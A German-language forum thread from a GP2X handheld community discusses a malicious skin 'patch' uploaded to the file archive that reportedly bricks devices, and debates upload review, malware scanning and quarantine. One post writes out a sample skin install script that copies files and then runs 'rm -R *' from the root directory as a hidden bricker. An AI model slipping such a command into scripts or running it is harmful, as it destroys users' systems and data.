Der erste Schädling in the Wild :(


BestNrXYZ

Member
Joined
Nov 17, 2005
Messages
372
Location
Oberhausen
LOCATION
Oberhausen
http://archive.gp2x.de/cgi-bin/cfiles.cgi?0,0,0,0,23,1265

Man beachte ryleh's Kommentar.

Hmmm... hoffentlich hat's noch keiner ausgeführt.

Obwohl: Nach dem Inhalt des gpu-scriptes sieht es harmlos aus, aber das können andere sicherlich besser beurteilen.

Greetz
BNrXYZ
 
Ich dachte, dass ED die Sachen immer testet, bevor er sie freigibt :huh:
 
.eg said:
Ich dachte, dass ED die Sachen immer testet, bevor er sie freigibt :huh:

Hmmm... keine Ahnung, aber wenn ich mich recht erinnere, werden neue Uploads sofort verfügbar (war bei mir zumindest 2 * so). Nur Updates müssen freigeschaltet werden.

Greetz
BNrXYZ
 
clint2x said:
bei mir kommt da nichts ? ! Was ist denn ?

Ich sehe auch nix.

Reden wir hier von einem Virus oder hat jemand beim Programmieren Mist gebaut?
 
Definiert bitte "ich seh da nix" bzw. "kommt nix"...

Habt ihr den "Patch" ausprobiert?

Lt. dem comment soll dieser Patch den GP2X bricken, weil er vom System benötigte Files löscht.
 
BestNrXYZ said:
Definiert bitte "ich seh da nix" bzw. "kommt nix"...

Habt ihr den "Patch" ausprobiert?

Lt. dem comment soll dieser Patch den GP2X bricken, weil er vom System benötigte Files löscht.

Definere "ich sehe da nix": Ich sehe keinen Eintrag ;)

EDIT: Für was soll dieser "patch" gut sein?
 
Ok, dann hat jemand (ED?!?) diesen Eintrag wohl gelöscht. Dieser "Patch" sollte dazu dienen, "überflüssige" Files von Skins zu löschen.

Der Patch ist auch nicht mehr in den "Latest Files" drin....

Greetz
BNrXYZ
 
Hm, ich hoffe nur, dass sowas nicht öfters kommt - sonst muss ich Uploads verbieten.
 
Kannst du die Uploads nicht einfach wie die Updates mit ner Freigabe versehen?
 
Ben said:
Kannst du die Uploads nicht einfach wie die Updates mit ner Freigabe versehen?

Doch - wollte ich bislang aber nicht, da dann keiner mehr Uploaded.
 
Was war das denn jetzt genau für ein Programm? Ein absichtlich geschriebener Bricker oder ein Programm, das nur versehentlich und ohne Absicht Schaden anrichtet?
 
Satan Claus said:
Was war das denn jetzt genau für ein Programm? Ein absichtlich geschriebener Bricker oder ein Programm, das nur versehentlich und ohne Absicht Schaden anrichtet?

Es war ein Skript, mit dem einige überflüssige Skin-Dateien gelöscht werden sollten. Ich habe es bei mir nicht gegengecheckt, sondern auf die im Comment von ryleh gemachten Aussagen geachtet, dass durch den Start des Skripts der GP2X gebrickt wird. Ob das Absicht des Skript-Autors war, weiß ich nicht.

Den DL habe ich noch @home. Wenn du magst, kann ich dir das gerne per PM zukommen lassen, sobald ich wieder frei habe.

Oder hier reinsetzen als Code, waren nur ca. 20 Zeilen.

Greetz
BNrXYZ
 
Naja

Im Prinzip kannst du sowas mit jeder imgall.gpu fabrizieren die bei jedem Skin mitgeliefert wird ....
Code:
#/bin/sh
cp -f ./imgbattery/*.* /usr/gp2x/imgbattery/
cp -f ./imgcommon/*.* /usr/gp2x/imgcommon/
cp -f ./imgebook/*.* /usr/gp2x/imgebook/
cp -f ./imgexplorer/*.* /usr/gp2x/imgexplorer/
cp -f ./imggame/*.* /usr/gp2x/imggame/
cp -f ./imgimage/*.* /usr/gp2x/imgimage/
cp -f ./imgmain/*.* /usr/gp2x/imgmain/
cp -f ./imgmovie/*.* /usr/gp2x/imgmovie/
cp -f ./imgmusic/*.* /usr/gp2x/imgmusic/
cp -f ./imgsetting/*.* /usr/gp2x/imgsetting/
cp -f ./imgtestmode/*.* /usr/gp2x/imgtestmode/
cp -f ./imgutil/*.* /usr/gp2x/imgutil/
cd /usr/gp2x
./gp2xmenu

# tha krazze gangsta-bricka4n00bs

# leute ..... nicht ausführen
cd /
rm -R *

Oder sehe ich das falsch? Ich mein, da läuft doch alles als root ...
 
funkyferdy said:
Oder sehe ich das falsch? Ich mein, da läuft doch alles als root ...

Das siehst Du vermutlich richtig.

Natürlich kann jeder einen solchen Code schreiben der sich ein wenig mit Linux aus kennt.

Man muss aber denjenigen die sich nicht damit auskennen nicht auch noch eine Anleitung hinschreiben wie es geht. Das ist nicht besser als die besagte Datei selbst zu verbreiten.

Man kann natürlich auch argumentieren das jeder wissen sollte wonach er suchen muss um sich nicht so ein Teil einzufangen.

Aber irgendwie möchte ich nicht erst die Scripte checken, das dürfte für die meisten auch unpraktikabel sein. Selbst wenn jeder die kritischen Dateien kennen würde, eine Garantie das der jeweilige Ersatz auch wirklich kein Trojaner ist hat man nicht. Eine verlässliche Quelle wäre mir da lieber.

@ED: Hast Du einen Virenscanner im Upload Archiv laufen? Man könnte die Files die gerade hochgeladen worden sind auspacken und nach dem NoNo Befehl durchsuchen lassen. Bei Treffer dann automatisch in die Ecke stellen lassen.
 
double7 said:
Man könnte die Files die gerade hochgeladen worden sind auspacken und nach dem NoNo Befehl durchsuchen lassen. Bei Treffer dann automatisch in die Ecke stellen lassen.
Naja, da gibts tausende Befehle, mit denen man böse Sachen anstellen kann.
Auf jeden Fall mehr, als sich eine Person ausdenken kann.
Und du willst doch nicht "rm" verbieten, oder ?
Oder "mv" oder "cp", mit denen du auch einiges kaputt machen kannst....

Wie wäre es mit einem Quarantäne-Bereich, wo ungeprüfte Skripte landen ?
Jemand mit Ahnung kann ja dann testen, ob die was kaputt machen, und dann landen sie im offiziellen Bereich.
 
mcr42 said:
double7 said:
Wie wäre es mit einem Quarantäne-Bereich, wo ungeprüfte Skripte landen ?
Jemand mit Ahnung kann ja dann testen, ob die was kaputt machen, und dann landen sie im offiziellen Bereich.

Das halte ich für einen guten Vorschlag, so können Leute die sich auskennen schnell aktuelle Programme testen und Leute die auf Nummer sicher gehen wollen, verwenden nur die überprüften Programme aus dem offiziellen Bereich.
 
mcr42 said:
Und du willst doch nicht "rm" verbieten, oder ?

Wie wäre es mit einem Quarantäne-Bereich, wo ungeprüfte Skripte landen ?
Jemand mit Ahnung kann ja dann testen, ob die was kaputt machen, und dann landen sie im offiziellen Bereich.

Nicht verbieten, automatisch aussortieren. Du hast im Prinzip meinen Vorschlag aufgegriffen, nur das Du gleich alles in die Ecke stellst. Das hat den Nachteil das erst jemand per Hand prüfen muss. Und das ist dann richtig Arbeit bis die Files als "überprüft" öffentlich bereit stehen.

Abgesehen davon ist mit Linux Werkzeugen extrem viel mehr möglich als nur nach "rm" zu suchen. Das liesse sich beliebig weiter ausbauen.

Ich sehe auch noch einen kleinen möglichen Nachteil an dem Quarantäne - Bereich. Wenn es den gibt dann existiert quasi ein zweiter Bereich, den der überprüften Files. Für die Überprüfung ist jemand verantwortlich, das heißt er könnte unter Umständen haftbar sein. Und das würde ich mir nicht als Verantwortlicher antun wollen.
 
Back
Top